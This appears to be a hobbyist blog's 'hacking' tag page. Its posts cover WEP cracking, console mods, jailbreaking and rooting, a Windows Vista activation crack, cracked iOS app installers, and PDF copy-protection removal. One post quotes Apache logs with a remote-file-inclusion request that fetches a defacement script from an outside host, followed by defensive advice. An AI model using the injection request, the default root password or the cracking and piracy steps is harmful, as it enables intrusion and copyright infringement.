hacking

  • This is the kind of geek stuff that put a big smile on my face when I read it... a portable ladtop capable of listening 300 wireless networks and hacking WEP keys in 5 minutes....

    A small security firm has made a portable computer that is capable of scanning 300 networks simultaneously. Dubbed the "Janus Project", the computer also has a unique "Instant Off" switch that renders the captured data inaccessible.

    At first glance, the Janus computer looks like a ladtop, but Williams said it is much more powerful than that. Inside the rugged yellow case sits a mini-computer motherboard powered by a 1.5 GHz VIA C7 processor and an Acer 17" LCD screen. Ubuntu 6.0 Linux runs the eight Atheros a/b/g Gold mini-PCI cards which continuously scan wireless networks. [....]

    In addition to scanning for wireless traffic, Williams says the computer can break most WEP keys very quickly by focusing all eight wireless cards on the access point. Using a combination of common utilities like airreplay, airdump and aircrack, Willams said, "When I use all 8 radios to focus in on a single access point, [the WEP key] lasts less than five minutes." However, he added that some retail wireless access points will "just die" after being hit with so much traffic... read more here

  • logo_acunetix

    I will use it on my host very soon, if you have your own root server, this tool must be part of your administrator toolbox. Joomla! team use it to test the core framework, so we should be on the safe side, unfortunately we are are all using too many plug-ins that may be unsecure.. Here is how a report generated using Acunetix WVS look like (PDF - 1.5MB).

    Acunetix Web Vulnerability Scanner automatically scans your web applications / website (shopping carts, forms, dynamic content, etc.) and web services for vulnerabilities such as SQL injection, Blind SQL Injection, Cross site scripting, Google hacking, CRLF Injection & other web attacks. Acunetix crawls and analyzes websites including flash content, AJAX / Web 2.0. Also includes reporting for PCI Compliance, OWASP & more

    Out of the 100,000 websites scanned by Acunetix WVS, 42% were found to be vulnerable to Cross Site Scripting. XSS is extremely dangerous and the number of the attacks is on the rise. Hackers are manipulating these vulnerabilities to steal organizations’ sensitive data. Can you afford to be next?

    Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. Exploited Cross Site Scripting is commonly used to achieve the following malicious results:

    • Identity theft
    • Accessing sensitive or restricted information
    • Gaining free access to otherwise paid for content
    • Spying on user’s web browsing habits
    • Altering browser functionality
    • Public defamation of an individual or corporation
    • Web application defacement
    • Denial of Service attacks

    Scan your website for Cross Site Scripting Vulnerabilities at no cost NOW

    Get an insight into Acunetix Manual

  • Add a led to your Xbox to seehard disk activity

    This mod is quite risky, especially if you
    can not solder with precision 

    xboxIcon Legal Issues

    1. It is strictly forbidden to modify your xBox, sell or install mods chip in france.
    2. Even opening the XBOX is forbidden.
    3. Remember pirating is a crime, support the developers and film companies.

    {mosgoogle center}

    xboxIcon 1. How To

    Required:
    • LED
    • Resistor 220 Ohms

    The resistor (value depending of the LED power) has to be soldered on the longest LED wire



    +5 Volts is taken from the connector, you can open the connector and close it without any difficulties

    The trickiest part is to solder on pin39 the signal (negative)

    You should also verify carefully your soldering, this tool may help



    Drill a 3mm hole or bigger depending on LED size

    Final Result


  • sony_playstation_ps3

    Ken Kutaragi reveals the console's hard drive will use alternate OS, hints that it will ship separately and will come in more than one model.
    Since E3, Sony Computer Entertainment president Ken Kutaragi has been calling the PlayStation 3 an "entertainment supercomputer" rather than a gaming console. Now, he's revealed a new plan to make sure that it's acknowledged as one. In an interview with Impress PC Watch, Kutaragi disclosed that he plans to install the Linux operating system on the PS3's hard disc drive (HDD) so it will be recognized as a computer, rather than a mere console.

    Read more HERE at www.gamespot.com

  • I use the hard way, free but a bit more difficult as it require a rooted device, I personally use “Android Terminal Emulator” with granted root permissions (after typing su a prompt will appear)

    Android how to delete system application

    su (enter)
    mount -o rw,remount /system (enter)
    rm -r /system/app/FILE-NAME-HERE.apk (enter)

    How to remove this SHIT of myTaxi – Passenger Taxi App on Samsung Galaxy S3

    This application got installed without my knowledge by a Samsung update as a System App that CANNOT BE UN INSTALLED!

    First before I forgot: Go to hell Samsung andIntelligent Apps GmbH

    If either of you continue in that direction, installing software without my prior permission, the next update to my Samsung Galaxy S3 will be CyanogenMod 10

    Back to the removal of MyTaxi,&160; Samsung did hide taxi.android.client_v2.5.1.apk under the name /system/app/samsung_ch.apk

    To remove it

    su (enter)
    mount -o rw,remount /system (enter)
    rm -r /system/app/samsung_ch.apk (enter)
  • How many times have you seen an alert similar to one of the below while trying to connect to the café or airport WiFi to check email or login to a secure website?

    1507221


  • The hacker “Muslix64” who cracked HD DVD strikes again by defeating Blu-ray Disc encryption!!!

    The HD-DVD hack is a java based command line utility (source code is AVAILABLE!) that decrypt video files (.evo) from a disk that you own, to your hard drive and you can play them back...

    Basically on Blu-ray disk, “Muslix64” is using a plain text attack on data... ”

    This is a very basic, but [powerful] crypto attack that I have used to decrypt both [HD DVD and Blu-ray] formats,” he wrote.

     “After reading posts of people trying to get the keys in memory, I realized, I have a different way of looking into the problem…A lot of people try to attack the software, I'm attacking the data!” ” So I spent more time analysing the data, to look for patterns or something special to mount my known-plaintext attack,”

    Muslix64 explains. “Because I know the keys are unprotected in memory, I can skip all the [painful] process of code reversal. ” read more at http://dailytech.com/Bluray+Encryption+Defeated/article5795.htm



     

  • A SECURITY flaw could allow hackers to eavesdrop on cellphone conversations made on Bluetooth-based wireless headsets was revealed in april 2004...But at that time an expensive piece of hardware was needed. Now it is even worse a simple brute force while the device are doing keyring exchange...

    "Whitehouse showed in 2004 that a hacker could arrive at this link key without knowing the PIN using a piece of equipment called a Bluetooth sniffer. This can record the exchanged messages being used to derive the link key and feed the recordings to software that knows the Bluetooth algorithms and can cycle through all 10,000 possibilities of the PIN. Once a hacker knows the link keys, Whitehouse reasoned they could hijack the device."

    Now the new attack force the  two bluetooth devices to pair, they can work out the link key in just 0.06 seconds on a Pentium IV-enabled computer, and 0.3 seconds on a Pentium-III

     

  • Tomshardware has an interesting articles for all XBOX modder which prefer having an original Network attached Storage instead of a game machine.

    With the arrival of the Xbox360, there will soon be a buyer's market for its older sibling. Kevin Herring shows how to give an Xbox a new lease on life as a full-featured NAS.


    {mosgoogle}

  • spektrumDX5e

    Spektrum introduces another enormous change for the RC industry—The most affordable full-range 2.4GHz radio ever available. The DX5e brings together the unbeatable control of genuine DSM2 technology with the simplest, easiest-to-use design available, letting anyone, from park fliers to students to instructors and more, take advantage of Spektrum technology for less

    Mode 2 is most often used in the United States, while Mode 1 is most often used in Europe, there are two other modes that are used overseas and here is a listing of the 4 modes and their actions.

     

      Left stick Right stick
    up/down left/right up/down left/right
    Mode 1 elevator rudder throttle aileron
    Mode 2 throttle rudder elevator aileron
    Mode 3 elevator aileron throttle rudder
    Mode 4 throttle aileron elevator rudder
  • I already saw this at the french robotic cup in 1999, here is Your chance to buy a mature kit: the Xport 2.0. You can now create amazing robot creations with a Game Boy and some LEGOs....

    The new Xport 2.0 turns the Game Boy Advance (GBA) into a powerful embedded development system. 

    • 4 closed-loop back-EMF motor controllers
    • 16 digital sensor inputs
    • 8 analog sensor inputs
    • In-system NiCd, NiMH battery charger
    • Battery voltage monitor
    • Comprehensive open-source software
    • Optional Bluetooth and other accessories

    Combine with a game boy advance, you have among other things a system:

    • Programmable in C or C++
    • PCM sound
    • 240x160 TFT color LCD
    • Powerful 32-bit RISC CPU

  • From http://www.bunniestudios.com/wordpress/?p=74 the man wo break the first XBOX.

    At any rate, some very interesting things are afoot. Much of it stems from the discovery of an all-media bootable kiosk demo disk. Many hackers will instantly recognize the value of this, but it’s still interesting to reflect on the significance of this find. Like the original Xbox, the Xbox360 uses a media flag on its executables.

    The media flag tells the OS what type of media it should be on; typically, games are released with the flag set to Microsoft’s proprietary secure Xbox DVD format (which is in itself not that secure…). Significantly, only the executable is signed for a game; the data sections typically are not signed (presumably for performance reasons). Thus, one has the ability to fuzz the executable by corrupting the data sections, potentially invoking a buffer overrun or some other unintentional behavior–if one could effectively modify the data sections. Remember that this is normally not possible, since modifying the data segment requires making a copy to a writeable media, and this contradicts the signed media flag.

    Thus, the run-anywhere demo disk now enables software hackers to create and test the interaction of signed executables with modified game data using no tool other than a DVD-RW drive (and an Xbox360 console, still considerably rare and difficult to obtain in the US). Some of the more interesting modifiable data regions include Shockwave Flash movies, and the pixel shaders executed by the GPU (more info can be found on the xboxhacker.net website). Of particular interest is the MEMEXPORT shader command in the 360, which could enable people to dump physical memory to the screen (where it can be digitized or extracted with a sniffer upstream of the ANA chip), or to some other peripheral function. Presuming plaintext kernel code can be extracted this way, it bootstraps further efforts in vulnerability analysis of the code running in the Xbox…and so forth. Of course, its quite possible that this hole is plugged, since Microsoft’s NGSCB spec calls for the Northbridge to limit DMA access from the graphics card to main memory. Furthermore, buffer overrun exploits have questionable applicability since each process runs as its own virtual machine and rumors has it that the no-execute bit is used on heap space. Still, I’m very surprised that such a media was even released into the wild by Microsoft…their own worst enemy is their own haste to get to the market and carelessness; security is for naught without consideration of human factors. Very exciting! Perhaps the Xbox360 will be opened without the need for significant hardware hacking.
  • dell-mini-inspiron1 MAC-OSX-Leopard

    There are a lot of netbooks on which you can install and run OS X, but if you're mindful of the handy comparison chart those lads at Boing Boing Gadgets have compiled, you'll know that the Mini 9 is about as ideal a platform as you'll find for a Hackintosh ultraportable: Everything from wi-fi, sound and the function keys down to the optional integrated mobile broadband card and the SD card reader are supported and work as they should. No hardware compromises at all. It's awesome. read this very nice tutorial atwww.gizmodo.com

    And it seems a lot of net book can are able to run with OSX, as it can be seen there


  •  I've already tried to reduce the surface of attack of my homepage by removing all un-needed components, modules, mambots but here is below what I've found into the log files...

    Hackers trying remote code injection

    were  found more than one time in apache error.log

    [Thu Aug 17 17:29:05 2006] [error] [client 81.214.151.223] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://recon.reschat.dk/images/gallery/tool25.txt?cmd=id HTTP/1.0

    Remember You should ASAP update the following components to their latest version:
    • com_securityimages < 3.0.5 use at least a version  > 3.0.6
    • com_hashcash < 1.2.1 use at least a version  > 1.2.2
    • com_bayesiannaivefilter has been developed but never release as a component, but it is still available at Joomla forge developer tree.
    This attack is trying to execute a scripts, locate at http://recon.reschat.dk/images/gallery/tool25.txt. If You go there, You'll find that th script is readable and contains a header.
    Defacing Tool 2.0 by xxxxxx
    Defacing Tool 2.0 by xxxxxxx" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface websites.

    Solutions:
    1. For com_bayesiannaivefilter sorry guys but I do not have this plugins nor it has ever been released in the wild. com_securityimages or com_hashcash, just Upgrade!
    2. If you manage a web host for which you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable. /etc/php.ini  allow_url_fopen = Off
     Hackers trying to access well known PHP files

    each lines below at least more than 500 times...in 1 day

    [Fri Aug 11 19:11:50 2006] [error] [client 221.87.148.77] Directory index forbidden by rule: /var/www/vhosts/waltercedric.com/httpdocs/components/com_htmlarea3_xtd-c/popups/ImageManager/
    [Mon Jul 31 13:07:12 2006] [error] [client 85.108.201.139] user  not found: /administrator/components/com_bayesiannaivefilter/lang.php
    [Mon Jul 31 13:07:19 2006] [error] [client 85.108.201.139] user admin: authentication failure for "/administrator/components/com_bayesiannaivefilter/lang.php": Password Mismatch
    [Sat Feb 18 21:44:47 2006] [error] [client 80.218.20.20] File does not exist: /var/www/vhosts/waltercedric.com/httpdocs/var, referer: http://www.waltercedric.com/administrator/index2.php?option=com_zoom&Itemid=&page=upload&formtype=scan

    Hacker trying to access  files that do not exist
    • /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/com_hashcash
    • wiki/administrator/
    • [Tue Aug 01 21:09:46 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_uhp/uhp_config.php
    • [Tue Aug 01 20:43:03 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_colophon/admin.colophon.php
    • [Mon Jul 31 20:11:25 2006] [error] [client 88.233.220.125] user  not found: /administrator/components/com_mgm/help.mgm.php
    which look like programs brute forcing with a set of rules some paths searching well known vulnerability

    Some strange attempts...

    [Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/MSOffice
    [Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/_vti_bin
    [Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/MSOffice
    [Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/_vti_bin
    [Mon Jul 31 16:58:44 2006] [error] [client 207.46.98.40] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/demo/httpdocs/function.fopen
    [Fri Jul 28 23:04:35 2006] [error] [client 85.103.107.26] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/path=attacker-example.com

  • Hackers have modified an estimated 150,000 of the 9 million Xboxes Microsoft has sold worldwide to turn them into PCs that would normally cost $800 or more. What you need:
    1. A new Xbox, with 733-megahertz processor, custom graphics chip, 8-gigabyte hard drive: $149
    2. A keyboard and mouse, with adapters: $35
    3. A modified start-up chip: $21
    4. 120-gigabyte hard drive: $120
    5. Linux ans some free software: $0
    Total: $325
    Source: USA TODAY research
  • Hack into a Windows PC - no password needed

    A security consultant based in New Zealand has released a tool that can unlock Windows computers in seconds without the need for a password.

    Adam Boileau first demonstrated the hack, which affects Windows XP computers but has not yet been tested with Windows Vista, at a security conference in Sydney in 2006, but Microsoft has yet to develop a fix.

    Interviewed in ITRadio'sRisky Business podcast, Boileau said the tool, released to the public today, could "unlock locked Windows machines or login without a password... merely by plugging in your Firewire cable and running a command".

    Read More HERE

    It's official: Pirates crack Vista at last

    A genuine crack for Windows Vista has just been released by pirate group Pantheon, which allows a pirated, non-activated installation of Vista (Home Basic/Premium and Ultimate) to be properly activated and made fully-operational.

    Unlike cracks which have been floating around since Vista RTM was released in late November, this crack doesn&8217;t simply get around product activation with beta activation files or timestop cracks - it actually makes use of the activation process. It seems that Microsoft has allowed large OEMs like ASUS to ship their products with a pre-installed version of Vista that doesn&8217;t require product activation &8211; apparently because end users would find it too inconvenient.

    This version of Vista uses System-Locked Pre-Installation 2.0 (SLP 2.0). It allows the &8220;Royalty OEMs&8221; to embed specific licensing information into the operating system which Vista can activate without having to go back to Microsoft for verification. The licensing components include the OEM&8217;s hardware-embedded BIOS ACPI_SLIC (which has been signed by Microsoft), an XML certificate file which corresponds to this ACPI_SLIC and a specific OEM product key.

    Pantheon released a bundle which includes the certificate files from ASUS, Dell, HP and Lenovo along with OEM product keys for Vista Home Basic, Home Premium and Ultimate, and an emulator which allows the BIOS ACPI_SLIC driver for any manufacturer to be installed without requiring the system to be physically running that hardware. For example, you can install the ASUS certificate information on any machine, not just an ASUS.

    Via APCMag, read more HERE

  • Â

    Â

    http://www.snocud.pf/zerofil/neogeo.htmConvert a NeoGeo pad and use it on your PC.
    http://www.neogeousa.com/mods/svideo.html"S-Video can offer a much better video signal for those with newer televisions..."
    +
    Some notes about svideo mods
    http://nfg.2y.net/games/neorgb/Study about the decrease of RGB output quality circuitry.
    http://www.nickthfury.com/neogeo/cdmods.htmNeo Geo CD mods, Neo Geo AES mods. Great site
    http://www.gamesx.com/importmod/neocd5060.htmNEO GEO CD 50-60Hz Mod
    http://www.gamesx.com/importmod/neocdzcon.htmNEO CDZ Import modification
    http://www.nickthfury.com/neogeo/acc.htmNeoGeo Accessories
  • iphone

    You need of course a Jailbroken iPhone, normal and loyal user of Apple  you are not allowed to save your own SMS!!!

    shh to your iphone, using WINSCP for example

    iphone.export.sms.00

    Use login root, default password is alpine (but you should have change it to something else for better security a long time ago)

    Go to the directory  /private/var/mobile/Library/SMS

    iphone.export.sms.01

    and copy the file sms.db to your local disk

    Download SQL lite browser at http://sqlitebrowser.sourceforge.net/

    SQLite Database Browser is a freeware, public domain, open source visual tool used to create, design and edit database files compatible with SQLite. It is meant to be used for users and developers that want to create databases, edit and search data using a familiar spreadsheet-like interface, without the need to learn complicated SQL commands. Controls and wizards are available for users to:

    • Create and compact database files
    • Create, define, modify and delete tables
    • Create, define and delete indexes
    • Browse, edit, add and delete records
    • Search records
    • Import and export records as text
    • Import and export tables from/to CSV files
    • Import and export databases from/to SQL dump files
    • Issue SQL queries and inspect the results
    • Examine a log of all SQL commands issued by the application

    open the file sms.db  in Sql Lite Browser

    iphone.export.sms.02 

    Click on the Tab “Browse Data” and select the Table “Message”, you can see your SMS!

    Now under the menu File – Export – Export as CSV

    iphone.export.sms.03

    You’re done!

    iphone.export.sms.04

    Attention: even if the file format (CSV) can be read in any text editor /Open Office/Office Excel, the data are not presented in an user friendly manner!

    #@$!& APPLE: This is My iPhone and these are MY DATA!

  • pdf-iconSome PDFs on the internet have a copy protection to make sure you cannot copy-paste any content from the PDF into a document you're writing. Defeating this protection is very easy as you will see in this post.

    I will use a combination of Open Source tools to extract the content of a protected PDF..

     

     

     

     

    This is how a protected PDF look like in Adobe Acrobat under File - Properties

     password.protected.pdf.copy.text 

    You will need to obtain GhostScript

    Ghostscript is an interpreter for the PostScript language and for PDF, and related software and documentation.

    So run the self-extracting EXE from http://pages.cs.wisc.edu/~ghost/doc/GPL/gpl871.htm to install the engine

    gs871w32.exe, GPL Ghostscript 8.71 for 32-bit Windows (the common variety).
    gs871w64.exe, GPL Ghostscript 8.71 for 64-bit Windows (x86_64).

    Now install the viewer from http://pages.cs.wisc.edu/~ghost/gsview/get49.htm 

    gsv49w32.exeWin32 self extracting archive
    gsv49w64.exeWin64 (x86_64) self extracting archive

    password.protected.pdf.copy.gsview

    Then start Gsview and Open the PDF, you can either convert it to PS (Postscript) and you’ll be able to edit it like any other document or under the menu  Edit - text extract you’ll be able to save the context in a Text file. Enjoy :-)

  • vshare

    Disclaimer: I don’t recommend vShare or any other alternatives to Install .IPA files.&160; The only reason of this post is to help users try out paid apps before they decide to purchase them. This post do not support piracy or piracy-related apps.

    I recommend you to use instead Android since you can test any paid application for 24h and get a refund if you are not satisfied!

    You will need:

    Only 2 steps are required

    1. Install AppSync
    2. Install vShare

    AppSync

    • Is a package that Cydia asks you to install if you want to install Installous/vShare.
    • Allows users to sync and install cracked App Store applications to your iOS device.
    • Works by patching the Mobile Installation file on the iOS firmware which is needed to install .ipa files (App Store Apps) without going through iTunes.
    • Is only available through an external repository that must be added to Cydia.

    Install

    1. Open Cydia
    2. Go to Manage -> Sources -> Edit -> and tap on Add
    3. Type repo.hackyouriphone.org and tap on Add Source to add the repo
    4. Now search for “AppSync for iOS 6″&160; and install it

    &160;

    vShare


    After you’ve installed AppSync, do the following:

    Enjoy!

  • An interesting articles which also explain You how to empower the queries capacities of Google serach engine. Note that Google has nothig to do with this security breach, their search engine is simply too efficient and users not enough clever to store all sensitive data in a cryptographical container like PGPdrive, or TrueCrypt.

    Google is in many ways the most useful tool available to the bad guys, and the most dangerous Web site on the Internet for many, many thousands of individuals and organizations. Read more at SecurityFocus

    Google has been and will always be a valuable tool in my daily work as It allow me to resolve a lot of developer problem in no time...

  • 500px-android-logo_svg&160;Nullwire has posted a how to

    1. Download and install the Android SDK found here.
    2. Download this zip containing new latest Android images:

    3. Unpack files to a temporary location.
    4. Backup the folder <android-sdk-folder>/tools/lib/images (<android-sdk-folder> is the Android SDK installation folder)
    5. Replace the files ramdisk.img, system.img and userdata.img in <android-sdk-folder>/tools/lib/images with the files unpacked from the zip in step 3.
    6. Start the emulator and wait.

    android.cupcake And if you don't want to try this HACK, just watch the posted Screencast detailing the main new features of Cupcake
  • jailbreak  Apple iOS 4.1 is live for Iphone 4, 3GS, IPod Touch 2G and 3G, time to jailbreak :-)

    Jailbreak

    1. Download and install the latest version of iTunes 10
    2. Use CYDIA AptBackUp  to also save your "non approved apps", When you next back up your iPhone up with iTunes this application create a list that is backed up as well. So next time you have to restore or upgrade you restore from ITunes install AptBackUp and CYDIA will install all the apps/mods on the list.
    3. Start iTunes and sync your iPhone to save all your data
    4. Download Sn0wbreeze http://bit.ly/bKcoHy and the original iOS 4.1 firmware files for your version of iPhone/iPod
    5. Only the 1.8beta support iOS 4.1 download here http://bit.ly/ahVzJL
    6. Start Sn0wbreeze and select “Simple Mode”, browse for your .ipsw file, “Do you want to activate your iPhone?” NO,it create the custom .ipsw
    7. Restore your iPhone wit that custom firmware (latest iOS with old baseband :-)), click SHIFT then on restore, locate file and wait...wait
    8. When you have latest firmware, just restore your data using the backup done previously at point 2
    9. Run CYDIA to install AptBackUp again
    10. Run AptBackUp and click restore to get all your non approved applications back!

    iOS 4.1 Software Update

    This update contains improvements, including the following:

    • Game Center
      • Send and receive friend request
      • Invite friends to multi-player games over the Internet
      • Play multi-player games by auto-matching with other players
      • View Leader boards and Achievements
      • Discover new games from friends
    • High dynamic range (HDR) photos on iPhone 4
    • Support for TV show rentals on iTunes
    • Ability to upload HD videos to YouTube and Mobile Me over Wi-Fi on iPhone 4
    • Additional support for AVRCP-supported accessories,  including next & previous track control
    • Face Time calling directly from Favorites
    • Bug fixes, including:
      • iPhone 4 proximity sensor performance
      • iPhone 3G performance
      • Nike+iPod fixes
      • Bluetooth improvements
    • Products compatible with this software update:
      • iPhone 4
      • iPhone 3GS
      • iPhone 3G
      • iPod touch 2nd generation, or later

    Game Center requires iPhone 4, iPhone 3GS, iPod touch 2nd generation or later.

  • It seems that the latest sport these days is to hack a running device powered by a linux kernel. This time Linux reveal its power inside a Network Attached Storage (NAS). Originally powered by a Linksys firmware, it can be enhanced greatly by an open source alternative openSlug(beta but promising) or Unslug(stable)
    For openSlug:

     

     

       1. Number of drives attached to slug can be greater than 2.
       2. Bluetooth support can be added.
       3. More RAM can be supported.
       4. RunApex and use a different bootloader with cool features.
       5. OpenSlugNativeCompileEnvironment Compile natively on OpenSlug.

    Thanks people, I will surely aquire one NSLU2 very soon!

    The same idea, but a different device: Wireless router WRT54G

  • Typically Me, an article before "how to enhance security of webapplication", and article after "how to break everything a lot faster"... I suggest You to keep alwas an eyes at what going on behind the scene (hacking) in order to do everything You can to save your ass

     If you do Web application security assessments, this page is for you. We've gathered all of the tools and techniques discussed in Hacking Exposed: Web Applications (that we use every day as consultants) and cataloged them here. This is an abbreviated recitation of Appendix B in the book, with live hyperlinks for easy access. Keep your eyes on this space as we post custom scripts and tools from the authors!  from http://www.webhackingexposed.com